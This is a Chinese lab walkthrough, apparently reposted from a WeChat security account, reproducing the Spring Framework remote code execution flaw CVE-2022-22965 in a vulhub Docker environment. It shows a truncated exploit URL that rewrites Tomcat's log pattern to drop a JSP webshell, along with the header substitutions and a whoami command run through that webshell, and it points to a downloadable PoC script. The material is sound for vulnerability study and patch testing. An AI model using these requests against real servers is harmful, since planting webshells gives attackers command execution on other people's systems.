乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
本文首发乌鸦安全知识星球,更新时间:2022.04.01
1. 漏洞介绍
Spring Framework
是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE
应用程序开发提供了一个好用的框架。当Spring
部署在JDK9
及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。
2. 漏洞复现
目前可以借助vulhub
一键复现该漏洞:
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965
在当前目录下使用命令:docker-compose up -d
即可一键开启环境:
看到当前的端口开在了8080
:
打开页面之后,可以看到当前服务已经起来了:
http://127.0.0.1:8080/
按照作者的链接:
http://127.0.0.1:8080/?name=Bob&age=25
出现页面:
然后根据提示,构造请求地址:(方法不唯一
)
http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25
该请求发出之后,需要进行变换:
红色部分替换为:
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2
效果查看下图:
然后访问:
http://10.30.2.146:8080//tomcatwar.jsp?pwd=j&cmd=whoami
执行命令即可!
3. 工具版
工具:因为考虑到现在的大环境,这里提供的工具仅仅能够在当前环境下使用,不能在其他的环境中使用!
请在后台回复关键字:spring 下载
直接执行脚本即可:
python3 vulhub_CVE-2022-22965_poc.py --url=http://127.0.0.1:8080
执行效果:
同样,不要多次执行!
4. 注意事项
不要频繁的往里面写,不然日志文件会炸,消除方法就是使用get
请求(vulhub
专属),停止写日志:
http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=
原文始发于微信公众号(白帽子社区):Spring Framework远程代码执行漏洞_CVE-2022-22965复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论